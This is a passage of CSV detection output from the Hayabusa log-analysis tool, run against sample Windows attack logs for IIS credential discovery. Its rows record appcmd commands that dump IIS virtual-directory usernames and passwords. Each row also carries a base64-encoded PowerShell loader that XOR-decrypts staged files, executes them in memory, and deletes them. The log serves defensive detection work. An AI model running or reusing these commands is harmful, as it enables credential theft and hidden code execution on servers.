0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""ERROR ( message:Configuration error "" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""ERROR ( message:Configuration error "" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Filename: redirection.config"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Filename: redirection.config"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwA